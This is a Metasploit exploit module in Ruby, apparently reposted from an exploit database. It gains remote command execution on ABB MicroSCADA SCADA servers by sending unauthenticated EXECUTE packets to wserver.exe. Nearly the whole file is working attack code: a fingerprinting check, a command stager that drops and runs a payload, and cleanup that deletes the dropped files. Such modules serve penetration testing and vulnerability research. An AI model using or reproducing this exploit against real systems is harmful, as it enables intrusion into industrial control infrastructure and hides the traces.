## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution', 'Description' => %q{ This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe component, which allows arbitrary commands. The component is disabled by default, but required when a project uses the SCIL function WORKSTATION_CALL. This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brian Gorenc', # Original discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '100324'], [ 'ZDI', '13-270' ], [ 'URL', 'http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/41ccfa8ccd0431e6c1257c1200395574/$file/ABB_SoftwareVulnerabi lityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Targets' => [ [ 'ABB MicroSCADA Pro SYS600 9.3', { } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 05 2013' )) register_options([Opt::RPORT(12221)], self.class) end def check # Send an EXECUTE packet without command, a valid response # should include an error code, which is good enough to # fingerprint. op = "EXECUTE\x00" pkt_length = [4 + op.length].pack("V") # 4 because of the packet length pkt = pkt_length pkt << op connect sock.put(pkt) res = sock.get_once disconnect if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit # More then 750 will trigger overflow... # Cleaning is done by the exploit on execute_cmdstager_end execute_cmdstager({:linemax => 750, :nodelete => true}) end def execute_cmdstager_end(opts) @var_tempdir = @stager_instance.instance_variable_get(:@tempdir) @var_decoded = @stager_instance.instance_variable_get(:@var_decoded) @var_encoded = @stager_instance.instance_variable_get(:@var_encoded) @var_decoder = @stager_instance.instance_variable_get(:@var_decoder) print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...") execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {}) print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...") execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {}) print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...") execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {}) end def execute_command(cmd, opts) op = "EXECUTE\x00" command = "cmd.exe /c #{cmd}" pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length pkt = pkt_length pkt << op pkt << command connect sock.put(pkt) res = sock.get_once disconnect unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1 fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager") end end end # Iranian Exploit DataBase = http://IeDb.Ir [2013-12-04]